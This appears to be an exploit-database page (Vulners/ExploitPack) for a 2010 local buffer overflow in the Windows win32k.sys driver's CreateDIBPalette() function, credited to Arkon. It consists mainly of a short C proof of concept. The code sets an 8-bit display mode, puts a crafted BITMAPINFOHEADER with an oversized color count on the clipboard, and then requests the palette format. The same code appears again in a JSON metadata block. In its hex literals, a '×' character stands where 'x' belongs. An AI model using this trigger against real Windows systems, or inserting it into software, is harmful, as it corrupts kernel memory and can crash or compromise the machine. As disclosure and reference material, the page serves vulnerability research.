Search...

Microsoft Windows - win32k.sys Driver CreateDIBPalette() Local Buffer Overflow

2010-08-06T00:00:00

ID EXPLOITPACK:FA1D43741C7543F2C476191A6E0FFF02
Type exploitpack
Reporter Arkon
Modified 2010-08-06T00:00:00

Description

Microsoft Windows - win32k.sys Driver CreateDIBPalette() Local Buffer Overflow

                                        
                                            // source: http://www.ragestorm.net/blogs/?p=255
// source: http://secunia.com/advisories/40870/

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0×200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0×1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:33", "references": [], "description": "\nMicrosoft Windows - win32k.sys Driver CreateDIBPalette() Local Buffer Overflow", "edition": 1, "reporter": "Arkon", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2010-08-06T00:00:00", "title": "Microsoft Windows - win32k.sys Driver CreateDIBPalette() Local Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-06T00:00:00", "id": "EXPLOITPACK:FA1D43741C7543F2C476191A6E0FFF02", "href": "", "viewCount": 2, "sourceData": "// source: http://www.ragestorm.net/blogs/?p=255\n// source: http://secunia.com/advisories/40870/\n\nDEVMODE dm = {0};\ndm.dmSize = sizeof(DEVMODE);\ndm.dmBitsPerPel = 8;\ndm.dmPelsWidth = 800;\ndm.dmPelsHeight = 600;\ndm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;\nChangeDisplaySettings(&dm, 0);\n\nBITMAPINFOHEADER bmih = {0};\nbmih.biClrUsed = 0\u00d7200;\n\nHGLOBAL h = GlobalAlloc(GMEM_FIXED, 0\u00d71000);\nmemcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));\nGlobalUnlock(h);\n\nOpenClipboard(NULL);\nSetClipboardData(CF_DIBV5, (HANDLE)h);\nCloseClipboard();\n\nOpenClipboard(NULL);\nGetClipboardData(CF_PALETTE);", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645524929}}